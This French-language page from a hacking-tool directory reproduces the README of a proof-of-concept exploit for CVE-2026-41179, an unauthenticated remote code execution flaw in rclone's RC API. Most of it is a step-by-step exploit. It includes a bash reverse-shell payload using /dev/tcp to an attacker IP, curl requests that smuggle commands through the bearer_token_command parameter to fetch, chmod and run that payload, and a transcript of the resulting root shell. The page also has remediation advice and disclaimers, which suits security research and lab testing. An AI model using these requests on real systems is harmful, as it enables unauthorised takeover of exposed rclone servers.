Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41179 — POC for CVE-2026-41179 | Kitploit
Outils/GitHubGitHub/pssec-io/cve-2026-41179
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationPayload DevelopmentLabs & Practice
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

POC for CVE-2026-41179

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41179 — Exécution de Code à Distance (RCE) non authentifiée via l'API RC de rclone

⚠️ À DES FINS ÉDUCATIVES UNIQUEMENT Ce dépôt est destiné strictement à la recherche en sécurité, à l'éducation et aux environnements de laboratoire autorisés. PSSec et les contributeurs de ce dépôt n'approuvent, ne soutiennent ni n'assument aucune responsabilité pour toute utilisation non autorisée, illégale ou malveillante des informations, codes ou techniques contenus dans ce document. En utilisant ce dépôt, vous acceptez d'être seul responsable de vos actions et de ne tester que des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite.


Aperçu

CVE-2026-41179 est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée dans l'API de contrôle à distance (RC) intégrée de rclone, affectant les versions 1.48.0 à 1.73.4.

DétailValeur
CVECVE-2026-41179
Score CVSS9.8 (Critique)
Versions affectéesrclone 1.48.0 – 1.73.4
Version corrigéerclone 1.73.5
ComposantAPI RC (point de terminaison /operations/fsinfo)
Vecteur d'attaqueRéseau — aucune authentification requise

Fonctionnement

rclone est livré avec une interface de contrôle à distance HTTP intégrée (rcd). Le point de terminaison /operations/fsinfo accepte une chaîne fs= fournie par l'utilisateur, qui est analysée et utilisée pour instancier un backend — y compris le backend WebDAV. Le backend WebDAV prend en charge un paramètre bearer_token_command, qui est passé directement à exec.Command() sans désinfection. Étant donné qu'aucune authentification n'est requise sur ce point de terminaison par défaut, un attaquant non authentifié peut déclencher l'exécution arbitraire de commandes OS sous l'utilisateur du processus rclone.

Chaîne d'attaque en bref :

root@kitploit:~
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user

Structure du dépôt

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Image rclone vulnérable (v1.69.3)
├── patched.Dockerfile.rclone  # Image rclone corrigée (v1.73.5)
├── poc.sh                     # Charge utile de shell inversé
└── instructions               # Procédure pas à pas en laboratoire

Configuration du laboratoire et exploitation (Étape par étape)

Prérequis

  • Docker
  • Un écouteur : penelope ou netcat
  • Python 3 (pour servir la charge utile)

Étape 1 — Construire l'image Docker vulnérable

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

Construit un conteneur Debian-slim exécutant rclone v1.69.3 avec l'API RC exposée sur le port 5572.


Étape 2 — Exécuter le conteneur vulnérable

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

L'API RC est maintenant accessible sans authentification à l'adresse http://127.0.0.1:5572.


Étape 3 — Démarrer votre écouteur

root@kitploit:~
penelope -p 5555
# OR
nc -lvnp 5555

Étape 4 — Configurer la charge utile du shell inversé

Modifiez poc.sh et définissez votre IP d'attaque et votre port d'écoute :

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

Étape 5 — Servir la charge utile via HTTP

Exécutez ceci depuis le même répertoire que poc.sh :

root@kitploit:~
python3 -m http.server 8888

Étape 6 — Télécharger la charge utile sur la cible

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

Étape 7 — Rendre la charge utile exécutable

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

Étape 8 — Exécuter la charge utile

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

Étape 9 — Récupérer le shell

Vérifiez votre écouteur — vous devriez recevoir un shell root du conteneur :

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

Étape 10 — Vérifier le correctif

Répétez les étapes 1 à 8 en utilisant l'image corrigée pour confirmer que la vulnérabilité est corrigée :

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

Envoyez la même requête curl vers le port 5573 — la commande ne doit pas s'exécuter.


Remédiation

  • Mettez à jour rclone vers v1.73.5 ou ultérieur — l'authentification est désormais appliquée sur tous les points de terminaison RC par défaut.
  • Si vous ne pouvez pas mettre à jour immédiatement, démarrez rcd avec les options --rc-user et --rc-pass pour exiger des identifiants.
  • Restreignez l'accès réseau au port RC (5572) via des règles de pare-feu — il ne doit jamais être exposé à des réseaux non fiables.
  • Envisagez d'utiliser explicitement --rc-no-auth=false (le nouveau paramètre par défaut dans les versions corrigées) dans les scripts de démarrage.

Avertissement

Ce dépôt est fourni uniquement à des fins éducatives et de recherche en sécurité autorisée. Le code de preuve de concept démontre une vulnérabilité réelle dans un environnement de laboratoire Docker contrôlé.

PSSec et tous les contributeurs :

  • N'autorisent pas ni n'encouragent l'exploitation de systèmes sans autorisation écrite explicite du propriétaire du système.
  • N'assument aucune responsabilité pour tout dommage, perte de données, conséquences juridiques ou mauvaise utilisation découlant de l'utilisation de ce matériel.
  • Recommandent que tous les tests soient effectués uniquement dans des environnements de laboratoire isolés que vous possédez ou pour lesquels vous êtes explicitement autorisé à tester.

L'utilisation non autorisée de ce code contre des systèmes de production ou des systèmes que vous ne possédez pas peut violer les lois sur la fraude informatique et la cybercriminalité dans votre juridiction.


CVE-2026-41179 — Recherche par PSSec

Télécharger l’outil